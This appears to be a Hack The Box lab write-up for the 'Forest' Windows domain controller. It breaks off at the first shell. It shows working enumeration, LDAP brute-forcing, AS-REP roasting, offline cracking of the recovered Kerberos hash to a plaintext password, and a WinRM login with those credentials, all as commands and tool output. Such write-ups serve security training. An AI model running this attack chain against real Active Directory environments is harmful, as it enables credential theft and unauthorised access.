Forest
Scanning
# Nmap 7.94 scan initiated Wed Jul 19 11:48:51 2023 as: nmap -sCV -A -p 53,88,135,139,389,464,593,636,3268,3269,5985,9389,445,47001,49664,49665,49666,49667,49676,49671,49677,49684,49703 -vvv -T4 -oN nmap.log 10.10.10.161
Nmap scan report for 10.10.10.161
Host is up, received conn-refused (0.25s latency).
Scanned at 2023-07-19 11:48:52 IST for 80s
PORT STATE SERVICE REASON VERSION
53/tcp open domain syn-ack Simple DNS Plus
88/tcp open kerberos-sec syn-ack Microsoft Windows Kerberos (server time: 2023-07-19 06:25:49Z)
135/tcp open msrpc syn-ack Microsoft Windows RPC
139/tcp open netbios-ssn syn-ack Microsoft Windows netbios-ssn
389/tcp open ldap syn-ack Microsoft Windows Active Directory LDAP (Domain: htb.local, Site: Default-First-Site-Name)
445/tcp open !ôsFV syn-ack Windows Server 2016 Standard 14393 microsoft-ds (workgroup: HTB)
464/tcp open kpasswd5? syn-ack
593/tcp open ncacn_http syn-ack Microsoft Windows RPC over HTTP 1.0
636/tcp open tcpwrapped syn-ack
3268/tcp open ldap syn-ack Microsoft Windows Active Directory LDAP (Domain: htb.local, Site: Default-First-Site-Name)
3269/tcp open tcpwrapped syn-ack
5985/tcp open http syn-ack Microsoft HTTPAPI httpd 2.0 (SSDP/UPnP)
|_http-server-header: Microsoft-HTTPAPI/2.0
|_http-title: Not Found
9389/tcp open mc-nmf syn-ack .NET Message Framing
47001/tcp open http syn-ack Microsoft HTTPAPI httpd 2.0 (SSDP/UPnP)
|_http-server-header: Microsoft-HTTPAPI/2.0
|_http-title: Not Found
49664/tcp open msrpc syn-ack Microsoft Windows RPC
49665/tcp open msrpc syn-ack Microsoft Windows RPC
49666/tcp open msrpc syn-ack Microsoft Windows RPC
49667/tcp open msrpc syn-ack Microsoft Windows RPC
49671/tcp open msrpc syn-ack Microsoft Windows RPC
49676/tcp open ncacn_http syn-ack Microsoft Windows RPC over HTTP 1.0
49677/tcp open msrpc syn-ack Microsoft Windows RPC
49684/tcp open msrpc syn-ack Microsoft Windows RPC
49703/tcp open msrpc syn-ack Microsoft Windows RPC
Service Info: Host: FOREST; OS: Windows; CPE: cpe:/o:microsoft:windows
Host script results:
| smb-os-discovery:
| OS: Windows Server 2016 Standard 14393 (Windows Server 2016 Standard 6.3)
| Computer name: FOREST
| NetBIOS computer name: FOREST\x00
| Domain name: htb.local
| Forest name: htb.local
| FQDN: FOREST.htb.local
|_ System time: 2023-07-18T23:26:41-07:00
| smb2-time:
| date: 2023-07-19T06:26:42
|_ start_date: 2023-07-19T06:22:40
| p2p-conficker:
| Checking for Conficker.C or higher...
| Check 1 (port 32753/tcp): CLEAN (Couldn't connect)
| Check 2 (port 62778/tcp): CLEAN (Couldn't connect)
| Check 3 (port 44587/udp): CLEAN (Failed to receive data)
| Check 4 (port 12952/udp): CLEAN (Timeout)
|_ 0/4 checks are positive: Host is CLEAN or ports are blocked
| smb2-security-mode:
| 3:1:1:
|_ Message signing enabled and required
| smb-security-mode:
| account_used: <blank>
| authentication_level: user
| challenge_response: supported
|_ message_signing: required
|_clock-skew: mean: 2h26m49s, deviation: 4h02m30s, median: 6m48s
Read data files from: /usr/bin/../share/nmap
Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
# Nmap done at Wed Jul 19 11:50:12 2023 -- 1 IP address (1 host up) scanned in 80.54 secondsEnumeration
LDAP
nmap --script ldap-brute --script-args ldap.base='"cn=users,dc=cqure,dc=net"' -p 389 10.10.10.161
Starting Nmap 7.94 ( https://nmap.org ) at 2023-07-19 12:03 IST
Nmap scan report for htb.local (10.10.10.161)
Host is up (0.24s latency).
PORT STATE SERVICE
389/tcp open ldap
| ldap-brute:
| cn=root,cn=users,dc=cqure,dc=net:<empty> => Valid credentials
| cn=admin,cn=users,dc=cqure,dc=net:<empty> => Valid credentials
| cn=administrator,cn=users,dc=cqure,dc=net:<empty> => Valid credentials
| cn=webadmin,cn=users,dc=cqure,dc=net:<empty> => Valid credentials
| cn=sysadmin,cn=users,dc=cqure,dc=net:<empty> => Valid credentials
| cn=netadmin,cn=users,dc=cqure,dc=net:<empty> => Valid credentials
| cn=guest,cn=users,dc=cqure,dc=net:<empty> => Valid credentials
| cn=user,cn=users,dc=cqure,dc=net:<empty> => Valid credentials
| cn=web,cn=users,dc=cqure,dc=net:<empty> => Valid credentials
|_ cn=test,cn=users,dc=cqure,dc=net:<empty> => Valid credentials 389/tcp open ldap
| ldap-search:
| Context: DC=htb,DC=local
| dn: DC=htb,DC=local
| objectClass: top
| objectClass: domain
| objectClass: domainDNS
| distinguishedName: DC=htb,DC=local
| instanceType: 5
| whenCreated: 2019/09/18 17:45:49 UTC
| whenChanged: 2023/07/19 06:22:30 UTC
| subRefs: DC=ForestDnsZones,DC=htb,DC=local
| subRefs: DC=DomainDnsZones,DC=htb,DC=local
| subRefs: CN=Configuration,DC=htb,DC=local
| uSNCreated: 4099
| dSASignature: \x01\x00\x00\x00(\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00:\xA3k#YyAJ\xB9Y_\x82h\x9A\x08q
| uSNChanged: 888873
| name: htb
| objectGUID: dff0c71a-49a9-264b-8c7b-52e3e2cb6eab
| replUpToDateVector: \x02\x00\x00\x00\x00\x00\x00\x00\x11\x00\x00\x00\x00\x00\x00\x00\x80+\xBA\x07\xA0+|B\x8E\x91\xB7\x8C\xE2\xAFM\x9B
| \x00\x00\x00\x00\x00\xD4\xBD>\x17\x03\x00\x00\x00i\xB5Y\x1F\xFA\x8B\xA9G\xB3\xB0R.\xA0\xD4b\xEC\x16P\x03\x00\x00\x00\x00\x00\x01\xD5\xAA\x13\x03\x0
0\x00\x00:\xA3k#YyAJ\xB9Y_\x82h\x9A\x08q\x05\xA0\x00\x00\x00\x00\x00\x00_!\x99\x13\x03\x00\x00\x00\xFD!?9\xEE\x966L\xB0C\xBC\x0Fp\x8Du\xBA\x19\x10\x04\x00\x0
0\x00\x00\x00n\xC9=\x17\x03\x00\x00\x00\x10<\x01A\xB4\x8C\x9DE\x88\xE2z\xBC\x05\x8E\xE3\xD7\x150\x03\x00\x00\x00\x00\x00\xD5\xD7\xA6\x13\x03\x00\x00\x00\xB50
\xC6a\xA2A\xB0E\xB14A\x1A\xB5N1c\x08\xD0\x00\x00\x00\x00\x00\x00\x9F=\x99\x13\x03\x00\x00\x00N|cxf\x16\xECI\xAB\x9C\xCDQ\xEE`H\x81\x13p\x02\x00\x00\x00\x00\x
00\xDDm\xA0\x13\x03\x00\x00\x001\xF4\xC6\x8BEpyC\xA6\x9B\x99\xF2\xB4\x8D&p\x0C\x10\x01\x00\x00\x00\x00\x00\x86\xC5\x99\x13\x03\x00\x00\x00\xB7\x02\xFE\x8F
| \x00\x00\x00\x00\x00\x99\xC5>\x17\x03\x00\x00\x00\x12\xE3\xA9\xF1\xC0\xBA\xB7O\xAEj\x87\xBC\xDE:\xA7-\x07\xC0\x00\x00\x00\x00\x00\x00\xC37\x99\x13\
x03\x00\x00\x00\x9E\xBD\x80\xF9D\x13\xFBE\xBA\xD8\x01
| \xE0\x8E\x1B\x8F\x1C\xD0\x0C\x00\x00\x00\x00\x00\xB1\xAF>\x17\x03\x00\x00\x00
| creationTime: 133342213503996465
| forceLogoff: -9223372036854775808
| lockoutDuration: -18000000000
| lockOutObservationWindow: -18000000000
| lockoutThreshold: 0
| maxPwdAge: -9223372036854775808
| minPwdAge: -864000000000No intersting information !
SMB
Starting enum4linux v0.9.1 ( http://labs.portcullis.co.uk/application/enum4linux/ ) on Wed Jul 19 11:51:51 2023
[34m =========================================( [0m[32mTarget Information[0m[34m )=========================================
[0mTarget ........... 10.10.10.161
RID Range ........ 500-550,1000-1050
Username ......... ''
Password ......... ''
Known Usernames .. administrator, guest, krbtgt, domain admins, root, bin, none
[34m ============================( [0m[32mEnumerating Workgroup/Domain on 10.10.10.161[0m[34m )============================
[0m[33m
[E] [0m[31mCan't find workgroup/domain
[0m
[34m ================================( [0m[32mNbtstat Information for 10.10.10.161[0m[34m )================================
[0mLooking up status of 10.10.10.161
No reply from 10.10.10.161
[34m ===================================( [0m[32mSession Check on 10.10.10.161[0m[34m )===================================
[0m[33m
[+] [0m[32mServer 10.10.10.161 allows sessions using username '', password ''
[0m
[34m ================================( [0m[32mGetting domain SID for 10.10.10.161[0m[34m )================================
[0mDomain Name: HTB
Domain Sid: S-1-5-21-3072663084-364016917-1341370565
[33m
[+] [0m[32mHost is part of a domain (not a workgroup)
[0m
[34m ===================================( [0m[32mOS information on 10.10.10.161[0m[34m )===================================
[0m[33m
[E] [0m[31mCan't get OS info with smbclient
[0m[33m
[+] [0m[32mGot OS info for 10.10.10.161 from srvinfo:
[0mdo_cmd: Could not initialise srvsvc. Error was NT_STATUS_ACCESS_DENIED
[34m =======================================( [0m[32mUsers on 10.10.10.161[0m[34m )=======================================
[0mindex: 0x2137 RID: 0x463 acb: 0x00020015 Account: $331000-VK4ADACQNUCA Name: (null) Desc: (null)
index: 0xfbc RID: 0x1f4 acb: 0x00000010 Account: Administrator Name: Administrator Desc: Built-in account for administering the computer/domain
index: 0x2369 RID: 0x47e acb: 0x00000210 Account: andy Name: Andy Hislip Desc: (null)
index: 0xfbe RID: 0x1f7 acb: 0x00000215 Account: DefaultAccount Name: (null) Desc: A user account managed by the system.
index: 0xfbd RID: 0x1f5 acb: 0x00000215 Account: Guest Name: (null) Desc: Built-in account for guest access to the computer/domain
index: 0x2352 RID: 0x478 acb: 0x00000210 Account: HealthMailbox0659cc1 Name: HealthMailbox-EXCH01-010 Desc: (null)
index: 0x234b RID: 0x471 acb: 0x00000210 Account: HealthMailbox670628e Name: HealthMailbox-EXCH01-003 Desc: (null)
index: 0x234d RID: 0x473 acb: 0x00000210 Account: HealthMailbox6ded678 Name: HealthMailbox-EXCH01-005 Desc: (null)
index: 0x2351 RID: 0x477 acb: 0x00000210 Account: HealthMailbox7108a4e Name: HealthMailbox-EXCH01-009 Desc: (null)
index: 0x234e RID: 0x474 acb: 0x00000210 Account: HealthMailbox83d6781 Name: HealthMailbox-EXCH01-006 Desc: (null)
index: 0x234c RID: 0x472 acb: 0x00000210 Account: HealthMailbox968e74d Name: HealthMailbox-EXCH01-004 Desc: (null)
index: 0x2350 RID: 0x476 acb: 0x00000210 Account: HealthMailboxb01ac64 Name: HealthMailbox-EXCH01-008 Desc: (null)
index: 0x234a RID: 0x470 acb: 0x00000210 Account: HealthMailboxc0a90c9 Name: HealthMailbox-EXCH01-002 Desc: (null)
index: 0x2348 RID: 0x46e acb: 0x00000210 Account: HealthMailboxc3d7722 Name: HealthMailbox-EXCH01-Mailbox-Database-1118319013 Desc: (null)
index: 0x2349 RID: 0x46f acb: 0x00000210 Account: HealthMailboxfc9daad Name: HealthMailbox-EXCH01-001 Desc: (null)
index: 0x234f RID: 0x475 acb: 0x00000210 Account: HealthMailboxfd87238 Name: HealthMailbox-EXCH01-007 Desc: (null)
index: 0xff4 RID: 0x1f6 acb: 0x00000011 Account: krbtgt Name: (null) Desc: Key Distribution Center Service Account
index: 0x2360 RID: 0x47a acb: 0x00000210 Account: lucinda Name: Lucinda Berger Desc: (null)
index: 0x236a RID: 0x47f acb: 0x00000210 Account: mark Name: Mark Brandt Desc: (null)
index: 0x236b RID: 0x480 acb: 0x00000210 Account: santi Name: Santi Rodriguez Desc: (null)
index: 0x235c RID: 0x479 acb: 0x00000210 Account: sebastien Name: Sebastien Caron Desc: (null)
index: 0x215a RID: 0x468 acb: 0x00020011 Account: SM_1b41c9286325456bb Name: Microsoft Exchange Migration Desc: (null)
index: 0x2161 RID: 0x46c acb: 0x00020011 Account: SM_1ffab36a2f5f479cb Name: SystemMailbox{8cc370d3-822a-4ab8-a926-bb94bd0641a9} Desc: (null)
index: 0x2156 RID: 0x464 acb: 0x00020011 Account: SM_2c8eef0a09b545acb Name: Microsoft Exchange Approval Assistant Desc: (null)
index: 0x2159 RID: 0x467 acb: 0x00020011 Account: SM_681f53d4942840e18 Name: Discovery Search Mailbox Desc: (null)
index: 0x2158 RID: 0x466 acb: 0x00020011 Account: SM_75a538d3025e4db9a Name: Microsoft Exchange Desc: (null)
index: 0x215c RID: 0x46a acb: 0x00020011 Account: SM_7c96b981967141ebb Name: E4E Encryption Store - Active Desc: (null)
index: 0x215b RID: 0x469 acb: 0x00020011 Account: SM_9b69f1b9d2cc45549 Name: Microsoft Exchange Federation Mailbox Desc: (null)
index: 0x215d RID: 0x46b acb: 0x00020011 Account: SM_c75ee099d0a64c91b Name: Microsoft Exchange Desc: (null)
index: 0x2157 RID: 0x465 acb: 0x00020011 Account: SM_ca8c2ed5bdab4dc9b Name: Microsoft Exchange Desc: (null)
index: 0x2365 RID: 0x47b acb: 0x00010210 Account: svc-alfresco Name: svc-alfresco Desc: (null)
user:[Administrator] rid:[0x1f4]
user:[Guest] rid:[0x1f5]
user:[krbtgt] rid:[0x1f6]
user:[DefaultAccount] rid:[0x1f7]
user:[$331000-VK4ADACQNUCA] rid:[0x463]
user:[SM_2c8eef0a09b545acb] rid:[0x464]
user:[SM_ca8c2ed5bdab4dc9b] rid:[0x465]
user:[SM_75a538d3025e4db9a] rid:[0x466]
user:[SM_681f53d4942840e18] rid:[0x467]
user:[SM_1b41c9286325456bb] rid:[0x468]
user:[SM_9b69f1b9d2cc45549] rid:[0x469]
user:[SM_7c96b981967141ebb] rid:[0x46a]
user:[SM_c75ee099d0a64c91b] rid:[0x46b]
user:[SM_1ffab36a2f5f479cb] rid:[0x46c]
user:[HealthMailboxc3d7722] rid:[0x46e]
user:[HealthMailboxfc9daad] rid:[0x46f]
user:[HealthMailboxc0a90c9] rid:[0x470]
user:[HealthMailbox670628e] rid:[0x471]
user:[HealthMailbox968e74d] rid:[0x472]
user:[HealthMailbox6ded678] rid:[0x473]
user:[HealthMailbox83d6781] rid:[0x474]
user:[HealthMailboxfd87238] rid:[0x475]
user:[HealthMailboxb01ac64] rid:[0x476]
user:[HealthMailbox7108a4e] rid:[0x477]
user:[HealthMailbox0659cc1] rid:[0x478]
user:[sebastien] rid:[0x479]
user:[lucinda] rid:[0x47a]
user:[svc-alfresco] rid:[0x47b]
user:[andy] rid:[0x47e]
user:[mark] rid:[0x47f]
user:[santi] rid:[0x480]
[34m =================================( [0m[32mShare Enumeration on 10.10.10.161[0m[34m )=================================
[0mdo_connect: Connection to 10.10.10.161 failed (Error NT_STATUS_RESOURCE_NAME_NOT_FOUND)
Sharename Type Comment
--------- ---- -------
Reconnecting with SMB1 for workgroup listing.
Unable to connect with SMB1 -- no workgroup available
[33m
[+] [0m[32mAttempting to map shares on 10.10.10.161
[0m
[34m ============================( [0m[32mPassword Policy Information for 10.10.10.161[0m[34m )============================
[0m
[+] Attaching to 10.10.10.161 using a NULL share
[+] Trying protocol 139/SMB...
[!] Protocol failed: Cannot request session (Called Name:10.10.10.161)
[+] Trying protocol 445/SMB...
[+] Found domain(s):
[+] HTB
[+] Builtin
[+] Password Info for Domain: HTB
[+] Minimum password length: 7
[+] Password history length: 24
[+] Maximum password age: Not Set
[+] Password Complexity Flags: 000000
[+] Domain Refuse Password Change: 0
[+] Domain Password Store Cleartext: 0
[+] Domain Password Lockout Admins: 0
[+] Domain Password No Clear Change: 0
[+] Domain Password No Anon Change: 0
[+] Domain Password Complex: 0
[+] Minimum password age: 1 day 4 minutes
[+] Reset Account Lockout Counter: 30 minutes
[+] Locked Account Duration: 30 minutes
[+] Account Lockout Threshold: None
[+] Forced Log off Time: Not Set
[33m
[+] [0m[32mRetieved partial password policy with rpcclient:
[0mPassword Complexity: Disabled
Minimum Password Length: 7
[34m =======================================( [0m[32mGroups on 10.10.10.161[0m[34m )=======================================
[0m[33m
[+] [0m[32mGetting builtin groups:
[0mgroup:[Account Operators] rid:[0x224]
group:[Pre-Windows 2000 Compatible Access] rid:[0x22a]
group:[Incoming Forest Trust Builders] rid:[0x22d]
group:[Windows Authorization Access Group] rid:[0x230]
group:[Terminal Server License Servers] rid:[0x231]
group:[Administrators] rid:[0x220]
group:[Users] rid:[0x221]
group:[Guests] rid:[0x222]
group:[Print Operators] rid:[0x226]
group:[Backup Operators] rid:[0x227]
group:[Replicator] rid:[0x228]
group:[Remote Desktop Users] rid:[0x22b]
group:[Network Configuration Operators] rid:[0x22c]
group:[Performance Monitor Users] rid:[0x22e]
group:[Performance Log Users] rid:[0x22f]
group:[Distributed COM Users] rid:[0x232]
group:[IIS_IUSRS] rid:[0x238]
group:[Cryptographic Operators] rid:[0x239]
group:[Event Log Readers] rid:[0x23d]
group:[Certificate Service DCOM Access] rid:[0x23e]
group:[RDS Remote Access Servers] rid:[0x23f]
group:[RDS Endpoint Servers] rid:[0x240]
group:[RDS Management Servers] rid:[0x241]
group:[Hyper-V Administrators] rid:[0x242]
group:[Access Control Assistance Operators] rid:[0x243]
group:[Remote Management Users] rid:[0x244]
group:[System Managed Accounts Group] rid:[0x245]
group:[Storage Replica Administrators] rid:[0x246]
group:[Server Operators] rid:[0x225]
[33m
[+] [0m[32m Getting builtin group memberships:
[0m[35mGroup: [0mPre-Windows 2000 Compatible Access' (RID: 554) has member: Couldn't lookup SIDs
[35mGroup: [0mGuests' (RID: 546) has member: Couldn't lookup SIDs
[35mGroup: [0mRemote Management Users' (RID: 580) has member: Couldn't lookup SIDs
[35mGroup: [0mAdministrators' (RID: 544) has member: Couldn't lookup SIDs
[35mGroup: [0mAccount Operators' (RID: 548) has member: Couldn't lookup SIDs
[35mGroup: [0mIIS_IUSRS' (RID: 568) has member: Couldn't lookup SIDs
[35mGroup: [0mSystem Managed Accounts Group' (RID: 581) has member: Couldn't lookup SIDs
[35mGroup: [0mUsers' (RID: 545) has member: Couldn't lookup SIDs
[35mGroup: [0mWindows Authorization Access Group' (RID: 560) has member: Couldn't lookup SIDs
[33m
[+] [0m[32m Getting local groups:
[0mgroup:[Cert Publishers] rid:[0x205]
group:[RAS and IAS Servers] rid:[0x229]
group:[Allowed RODC Password Replication Group] rid:[0x23b]
group:[Denied RODC Password Replication Group] rid:[0x23c]
group:[DnsAdmins] rid:[0x44d]
[33m
[+] [0m[32m Getting local group memberships:
[0m[35mGroup: [0mDenied RODC Password Replication Group' (RID: 572) has member: Couldn't lookup SIDs
[33m
[+] [0m[32m Getting domain groups:
[0mgroup:[Enterprise Read-only Domain Controllers] rid:[0x1f2]
group:[Domain Admins] rid:[0x200]
group:[Domain Users] rid:[0x201]
group:[Domain Guests] rid:[0x202]
group:[Domain Computers] rid:[0x203]
group:[Domain Controllers] rid:[0x204]
group:[Schema Admins] rid:[0x206]
group:[Enterprise Admins] rid:[0x207]
group:[Group Policy Creator Owners] rid:[0x208]
group:[Read-only Domain Controllers] rid:[0x209]
group:[Cloneable Domain Controllers] rid:[0x20a]
group:[Protected Users] rid:[0x20d]
group:[Key Admins] rid:[0x20e]
group:[Enterprise Key Admins] rid:[0x20f]
group:[DnsUpdateProxy] rid:[0x44e]
group:[Organization Management] rid:[0x450]
group:[Recipient Management] rid:[0x451]
group:[View-Only Organization Management] rid:[0x452]
group:[Public Folder Management] rid:[0x453]
group:[UM Management] rid:[0x454]
group:[Help Desk] rid:[0x455]
group:[Records Management] rid:[0x456]
group:[Discovery Management] rid:[0x457]
group:[Server Management] rid:[0x458]
group:[Delegated Setup] rid:[0x459]
group:[Hygiene Management] rid:[0x45a]
group:[Compliance Management] rid:[0x45b]
group:[Security Reader] rid:[0x45c]
group:[Security Administrator] rid:[0x45d]
group:[Exchange Servers] rid:[0x45e]
group:[Exchange Trusted Subsystem] rid:[0x45f]
group:[Managed Availability Servers] rid:[0x460]
group:[Exchange Windows Permissions] rid:[0x461]
group:[ExchangeLegacyInterop] rid:[0x462]
group:[$D31000-NSEL5BRJ63V7] rid:[0x46d]
group:[Service Accounts] rid:[0x47c]
group:[Privileged IT Accounts] rid:[0x47d]
group:[test] rid:[0x13ed]
[33m
[+] [0m[32m Getting domain group memberships:
[0m[35mGroup: [0m'Exchange Servers' (RID: 1118) has member: HTB\EXCH01$
[35mGroup: [0m'Exchange Servers' (RID: 1118) has member: HTB\$D31000-NSEL5BRJ63V7
[35mGroup: [0m'Managed Availability Servers' (RID: 1120) has member: HTB\EXCH01$
[35mGroup: [0m'Managed Availability Servers' (RID: 1120) has member: HTB\Exchange Servers
[35mGroup: [0m'Domain Users' (RID: 513) has member: HTB\Administrator
[35mGroup: [0m'Domain Users' (RID: 513) has member: HTB\DefaultAccount
[35mGroup: [0m'Domain Users' (RID: 513) has member: HTB\krbtgt
[35mGroup: [0m'Domain Users' (RID: 513) has member: HTB\$331000-VK4ADACQNUCA
[35mGroup: [0m'Domain Users' (RID: 513) has member: HTB\SM_2c8eef0a09b545acb
[35mGroup: [0m'Domain Users' (RID: 513) has member: HTB\SM_ca8c2ed5bdab4dc9b
[35mGroup: [0m'Domain Users' (RID: 513) has member: HTB\SM_75a538d3025e4db9a
[35mGroup: [0m'Domain Users' (RID: 513) has member: HTB\SM_681f53d4942840e18
[35mGroup: [0m'Domain Users' (RID: 513) has member: HTB\SM_1b41c9286325456bb
[35mGroup: [0m'Domain Users' (RID: 513) has member: HTB\SM_9b69f1b9d2cc45549
[35mGroup: [0m'Domain Users' (RID: 513) has member: HTB\SM_7c96b981967141ebb
[35mGroup: [0m'Domain Users' (RID: 513) has member: HTB\SM_c75ee099d0a64c91b
[35mGroup: [0m'Domain Users' (RID: 513) has member: HTB\SM_1ffab36a2f5f479cb
[35mGroup: [0m'Domain Users' (RID: 513) has member: HTB\HealthMailboxc3d7722
[35mGroup: [0m'Domain Users' (RID: 513) has member: HTB\HealthMailboxfc9daad
[35mGroup: [0m'Domain Users' (RID: 513) has member: HTB\HealthMailboxc0a90c9
[35mGroup: [0m'Domain Users' (RID: 513) has member: HTB\HealthMailbox670628e
[35mGroup: [0m'Domain Users' (RID: 513) has member: HTB\HealthMailbox968e74d
[35mGroup: [0m'Domain Users' (RID: 513) has member: HTB\HealthMailbox6ded678
[35mGroup: [0m'Domain Users' (RID: 513) has member: HTB\HealthMailbox83d6781
[35mGroup: [0m'Domain Users' (RID: 513) has member: HTB\HealthMailboxfd87238
[35mGroup: [0m'Domain Users' (RID: 513) has member: HTB\HealthMailboxb01ac64
[35mGroup: [0m'Domain Users' (RID: 513) has member: HTB\HealthMailbox7108a4e
[35mGroup: [0m'Domain Users' (RID: 513) has member: HTB\HealthMailbox0659cc1
[35mGroup: [0m'Domain Users' (RID: 513) has member: HTB\sebastien
[35mGroup: [0m'Domain Users' (RID: 513) has member: HTB\lucinda
[35mGroup: [0m'Domain Users' (RID: 513) has member: HTB\svc-alfresco
[35mGroup: [0m'Domain Users' (RID: 513) has member: HTB\andy
[35mGroup: [0m'Domain Users' (RID: 513) has member: HTB\mark
[35mGroup: [0m'Domain Users' (RID: 513) has member: HTB\santi
[35mGroup: [0m'Domain Controllers' (RID: 516) has member: HTB\FOREST$
[35mGroup: [0m'$D31000-NSEL5BRJ63V7' (RID: 1133) has member: HTB\EXCH01$
[35mGroup: [0m'Service Accounts' (RID: 1148) has member: HTB\svc-alfresco
[35mGroup: [0m'Domain Computers' (RID: 515) has member: HTB\EXCH01$
[35mGroup: [0m'Enterprise Admins' (RID: 519) has member: HTB\Administrator
[35mGroup: [0m'Domain Guests' (RID: 514) has member: HTB\Guest
[35mGroup: [0m'Schema Admins' (RID: 518) has member: HTB\Administrator
[35mGroup: [0m'Domain Admins' (RID: 512) has member: HTB\Administrator
[35mGroup: [0m'Exchange Windows Permissions' (RID: 1121) has member: HTB\Exchange Trusted Subsystem
[35mGroup: [0m'Organization Management' (RID: 1104) has member: HTB\Administrator
[35mGroup: [0m'Group Policy Creator Owners' (RID: 520) has member: HTB\Administrator
[35mGroup: [0m'Exchange Trusted Subsystem' (RID: 1119) has member: HTB\EXCH01$
[35mGroup: [0m'Privileged IT Accounts' (RID: 1149) has member: HTB\Service Accounts
[34m ==================( [0m[32mUsers on 10.10.10.161 via RID cycling (RIDS: 500-550,1000-1050)[0m[34m )==================
[0m[33m
[E] [0m[31mCouldn't get SID: NT_STATUS_ACCESS_DENIED. RID cycling not possible.
[0m
[34m ===============================( [0m[32mGetting printer info for 10.10.10.161[0m[34m )===============================
[0mdo_cmd: Could not initialise spoolss. Error was NT_STATUS_ACCESS_DENIED
enum4linux complete on Wed Jul 19 12:00:11 2023Got a bunch of users, let's try some AS-REP roasting
impacket-GetNPUsers htb.local/ -no-pass -usersfile out -dc-ip 10.10.10.161 | tee loot
Impacket v0.10.0 - Copyright 2022 SecureAuth Corporation
[-] User Administrator doesn't have UF_DONT_REQUIRE_PREAUTH set
[-] Kerberos SessionError: KDC_ERR_CLIENT_REVOKED(Clients credentials have been revoked)
[-] Kerberos SessionError: KDC_ERR_CLIENT_REVOKED(Clients credentials have been revoked)
[-] Kerberos SessionError: KDC_ERR_CLIENT_REVOKED(Clients credentials have been revoked)
[-] Kerberos SessionError: KDC_ERR_CLIENT_REVOKED(Clients credentials have been revoked)
[-] Kerberos SessionError: KDC_ERR_CLIENT_REVOKED(Clients credentials have been revoked)
[-] Kerberos SessionError: KDC_ERR_CLIENT_REVOKED(Clients credentials have been revoked)
[-] Kerberos SessionError: KDC_ERR_CLIENT_REVOKED(Clients credentials have been revoked)
[-] Kerberos SessionError: KDC_ERR_CLIENT_REVOKED(Clients credentials have been revoked)
[-] Kerberos SessionError: KDC_ERR_CLIENT_REVOKED(Clients credentials have been revoked)
[-] Kerberos SessionError: KDC_ERR_CLIENT_REVOKED(Clients credentials have been revoked)
[-] Kerberos SessionError: KDC_ERR_CLIENT_REVOKED(Clients credentials have been revoked)
[-] Kerberos SessionError: KDC_ERR_CLIENT_REVOKED(Clients credentials have been revoked)
[-] Kerberos SessionError: KDC_ERR_CLIENT_REVOKED(Clients credentials have been revoked)
[-] User HealthMailboxc3d7722 doesn't have UF_DONT_REQUIRE_PREAUTH set
[-] User HealthMailboxfc9daad doesn't have UF_DONT_REQUIRE_PREAUTH set
[-] User HealthMailboxc0a90c9 doesn't have UF_DONT_REQUIRE_PREAUTH set
[-] User HealthMailbox670628e doesn't have UF_DONT_REQUIRE_PREAUTH set
[-] User HealthMailbox968e74d doesn't have UF_DONT_REQUIRE_PREAUTH set
[-] User HealthMailbox6ded678 doesn't have UF_DONT_REQUIRE_PREAUTH set
[-] User HealthMailbox83d6781 doesn't have UF_DONT_REQUIRE_PREAUTH set
[-] User HealthMailboxfd87238 doesn't have UF_DONT_REQUIRE_PREAUTH set
[-] User HealthMailboxb01ac64 doesn't have UF_DONT_REQUIRE_PREAUTH set
[-] User HealthMailbox7108a4e doesn't have UF_DONT_REQUIRE_PREAUTH set
[-] User HealthMailbox0659cc1 doesn't have UF_DONT_REQUIRE_PREAUTH set
[-] User sebastien doesn't have UF_DONT_REQUIRE_PREAUTH set
[-] User lucinda doesn't have UF_DONT_REQUIRE_PREAUTH set
$krb5asrep$23$svc-alfresco@HTB.LOCAL:7980549e1883243c8222bdc0ac7226ab$3b937543e3b3e82114d0472b3356c9fbb685ad81824c112872a262a72add2ea3950ac5815cc4b2fba4a3015
d94d37f468085f93c6956fd1d003831d0cf0faadc3bb529db22f5463d2e1c002425230d400363205ce32ab0045460c7af4de27a143cfda48b59542933b776de73eb322115d5045ad087cc7ed68ab6
26d4c01a2694db306c3ef2aab3fd860f27948bfc461246f3bf6cd7a9c1649360cc1a754d7c3d166c677f6169080531877a66e0aa31cd8c59316f1db19e908ef994a46699a9cd8ea9941b2403bf21c
f43a1a34ef0f9e4369f666a40040ee73d9ed4ccdc73e952efb303f2170c
[-] User andy doesn't have UF_DONT_REQUIRE_PREAUTH set
[-] User mark doesn't have UF_DONT_REQUIRE_PREAUTH set Cracking the user's krbtgt hash using john
john loot --wordlist=/opt/rockyou.txt
Using default input encoding: UTF-8
Loaded 1 password hash (krb5asrep, Kerberos 5 AS-REP etype 17/18/23 [MD4 HMAC-MD5 RC4 / PBKDF2 HMAC-SHA1 AES 256/256 AVX2 8x])
Will run 6 OpenMP threads
Press 'q' or Ctrl-C to abort, almost any other key for status
s3rvice ($krb5asrep$23$svc-alfresco@HTB.LOCAL)
1g 0:00:00:02 DONE (2023-07-19 12:08) 0.3649g/s 1491Kp/s 1491Kc/s 1491KC/s s4ls469..s3r2s1
Use the "--show" option to display all of the cracked passwords reliably
Session completed. Let's enumerate for the shares again via cme
crackmapexec smb 10.10.10.161 -u 'svc-alfresco' -p 's3rvice' --shares
SMB 10.10.10.161 445 FOREST [*] Windows Server 2016 Standard 14393 x64 (name:FOREST) (domain:htb.local) (signing:True) (SMBv1:True)
SMB 10.10.10.161 445 FOREST [+] htb.local\svc-alfresco:s3rvice
SMB 10.10.10.161 445 FOREST [+] Enumerated shares
SMB 10.10.10.161 445 FOREST Share Permissions Remark
SMB 10.10.10.161 445 FOREST ----- ----------- ------
SMB 10.10.10.161 445 FOREST ADMIN$ Remote Admin
SMB 10.10.10.161 445 FOREST C$ Default share
SMB 10.10.10.161 445 FOREST IPC$ Remote IPC
SMB 10.10.10.161 445 FOREST NETLOGON READ Logon server share
SMB 10.10.10.161 445 FOREST SYSVOL READ Logon server shareNothing really interesting
Initial Foothold
Gaining a shell via winrm
evil-winrm -i 10.10.10.161 -u svc-alfresco -p s3rviceLast updated